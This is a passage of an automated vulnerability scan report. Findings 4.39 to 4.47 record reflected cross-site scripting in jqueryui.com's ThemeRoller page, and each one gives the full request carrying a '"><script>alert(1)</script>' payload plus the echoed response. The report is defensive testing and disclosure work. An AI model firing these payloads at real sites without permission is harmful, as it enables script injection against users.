GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa91800"><script>alert(1)</script>56b1ce80b05&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
d42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa91800"><script>alert(1)</script>56b1ce80b05&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

4.39. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab3"><script>alert(1)</script>a1bd18e5f3c was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa86ab3"><script>alert(1)</script>a1bd18e5f3c&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa86ab3"><script>alert(1)</script>a1bd18e5f3c&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.40. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8ff"><script>alert(1)</script>4dac13d937a was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=1005c8ff"><script>alert(1)</script>4dac13d937a&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=1005c8ff"><script>alert(1)</script>4dac13d937a&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColor
...[SNIP]...

4.41. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48783"><script>alert(1)</script>fd12b7de828 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=10048783"><script>alert(1)</script>fd12b7de828&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=10048783"><script>alert(1)</script>fd12b7de828&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefaul
...[SNIP]...

4.42. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c8d3"><script>alert(1)</script>73a17b4b229 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=857c8d3"><script>alert(1)</script>73a17b4b229&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=857c8d3"><script>alert(1)</script>73a17b4b229&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgC
...[SNIP]...

4.43. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab58a"><script>alert(1)</script>669106d826b was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95ab58a"><script>alert(1)</script>669106d826b&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
c88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95ab58a"><script>alert(1)</script>669106d826b&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

4.44. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca687"><script>alert(1)</script>6a780e1b0e0 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55ca687"><script>alert(1)</script>6a780e1b0e0&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55ca687"><script>alert(1)</script>6a780e1b0e0&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorCon
...[SNIP]...

4.45. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ba09"><script>alert(1)</script>1615e2d69db was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=559ba09"><script>alert(1)</script>1615e2d69db&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=559ba09"><script>alert(1)</script>1615e2d69db&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

4.46. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c945"><script>alert(1)</script>d5c19407d7 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=751c945"><script>alert(1)</script>d5c19407d7&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120173

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=751c945"><script>alert(1)</script>d5c19407d7&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd
...[SNIP]...

4.47. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

